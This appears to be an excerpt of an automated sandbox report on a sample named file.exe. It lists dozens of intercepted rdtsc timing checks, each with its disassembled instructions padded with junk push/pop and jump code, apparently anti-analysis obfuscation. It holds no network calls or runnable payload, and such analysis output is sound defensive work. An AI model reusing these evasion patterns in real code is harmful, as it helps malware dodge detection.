Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD543A second address: AD5440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD5440 second address: AD544A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD544A second address: AD5468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6084h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA3B1 second address: ADA3B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA3B5 second address: ADA3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0E647B6076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA3C1 second address: ADA3C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9605 second address: AD9609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD98C3 second address: AD98C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD98C8 second address: AD98CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD98CE second address: AD98D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD98D6 second address: AD98DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9BA6 second address: AD9BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9BB0 second address: AD9BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9BB6 second address: AD9BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E6551CA40h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA01D second address: ADA021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA021 second address: ADA06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0E6551CA3Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 je 00007F0E6551CA36h 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 jne 00007F0E6551CA50h 0x00000026 push edx 0x00000027 jl 00007F0E6551CA36h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE73EB second address: AE73F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5CAD second address: AE5CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5F9B second address: AE5FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E647B607Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5FB3 second address: AE5FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5FB7 second address: AE5FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5FBB second address: AE5FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5FC1 second address: AE5FC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6257 second address: AE6270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA43h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEB522 second address: AEB547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6086h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007F0E647B6076h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEB547 second address: AEB553 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E6551CA36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEB3D0 second address: AEB3D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEB3D6 second address: AEB3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEB3DC second address: AEB3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AECAC2 second address: AECAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AECAC8 second address: AECADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0E647B6080h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AECADD second address: AECAE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AECAE3 second address: AECAFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6083h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEFDF7 second address: AEFDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEFDFD second address: AEFE07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E647B6076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEF94F second address: AEF992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA40h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F0E6551CA40h 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F0E6551CA49h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEFAF7 second address: AEFAFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEFAFD second address: AEFB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB0FA second address: AFB0FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B01756 second address: B0175A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0175A second address: B0175E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0175E second address: B0176D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0E6551CA3Eh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B06CC1 second address: B06CE6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E647B6076h 0x00000008 jmp 00007F0E647B6085h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B06CE6 second address: B06CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B06CEA second address: B06CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F0E647B6076h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B08D95 second address: B08D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B08D9B second address: B08D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B08D9F second address: B08DAB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B08DAB second address: B08DCF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F0E647B6084h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B08DCF second address: B08DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F0E6551CA3Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B08F second address: B0B0B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B607Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E647B6088h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B11044 second address: B1104C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1104C second address: B1106F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0E647B6076h 0x00000008 jo 00007F0E647B6076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jne 00007F0E647B607Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B14A44 second address: B14A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1B96A second address: B1B982 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6084h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1B982 second address: B1B98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1B98B second address: B1B991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1B991 second address: B1B997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A157 second address: B1A17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6081h 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F0E647B607Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A2DB second address: B1A2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A2E4 second address: B1A2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A2E8 second address: B1A2EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A2EC second address: B1A2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F0E647B6076h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A448 second address: B1A46D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E6551CA36h 0x00000008 jmp 00007F0E6551CA3Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0E6551CA3Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A764 second address: B1A799 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E647B608Dh 0x00000008 jmp 00007F0E647B6085h 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007F0E647B607Ah 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F0E647B607Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A799 second address: B1A79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1AA56 second address: B1AA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1AA5A second address: B1AA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1AA5E second address: B1AA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F0E647B6076h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1AA6F second address: B1AA77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1AC06 second address: B1AC17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0E647B6076h 0x00000009 jc 00007F0E647B6076h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B29DA8 second address: B29DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B31568 second address: B3157F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0E647B607Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3157F second address: B3159A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F0E6551CA3Ch 0x0000000c js 00007F0E6551CA42h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3159A second address: B315A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B41F55 second address: B41F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B58F75 second address: B58F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F0E647B6076h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B58F80 second address: B58FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F0E6551CA36h 0x0000000c popad 0x0000000d jc 00007F0E6551CA3Eh 0x00000013 push edx 0x00000014 pop edx 0x00000015 jbe 00007F0E6551CA36h 0x0000001b pop edx 0x0000001c pop eax 0x0000001d jo 00007F0E6551CA51h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0E6551CA3Dh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B58FB4 second address: B58FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B59B08 second address: B59B29 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0E6551CA36h 0x00000008 jmp 00007F0E6551CA47h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B59B29 second address: B59B51 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F0E647B6076h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ecx 0x00000011 jmp 00007F0E647B6081h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B59B51 second address: B59B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5F475 second address: B5F479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5F545 second address: B5F54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5FA82 second address: B5FA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5FA86 second address: B5FA95 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5FA95 second address: B5FAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sbb dx, 81BBh 0x0000000c push dword ptr [ebp+122D20A7h] 0x00000012 mov dword ptr [ebp+122D1CBFh], edi 0x00000018 push E38F8C95h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5FAB7 second address: B5FABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B611B2 second address: B611C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jne 00007F0E647B6076h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B611C0 second address: B61205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0E6551CA36h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 js 00007F0E6551CA36h 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e jng 00007F0E6551CA6Dh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0E6551CA49h 0x0000002b js 00007F0E6551CA36h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0F4E second address: 50D0F56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0E88 second address: 50C0EC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0E6551CA46h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0E6551CA47h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100A1B second address: 5100A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100A34 second address: 5100A74 instructions: 0x00000000 rdtsc 0x00000002 mov ah, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F0E6551CA42h 0x0000000c jmp 00007F0E6551CA45h 0x00000011 popfd 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0E6551CA3Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100A74 second address: 5100A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B607Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100A84 second address: 5100ACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F0E6551CA3Bh 0x00000016 or eax, 3828FA9Eh 0x0000001c jmp 00007F0E6551CA49h 0x00000021 popfd 0x00000022 mov ecx, 0D22DE67h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A015F second address: 50A0181 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0E647B6084h 0x00000013 rdtsc
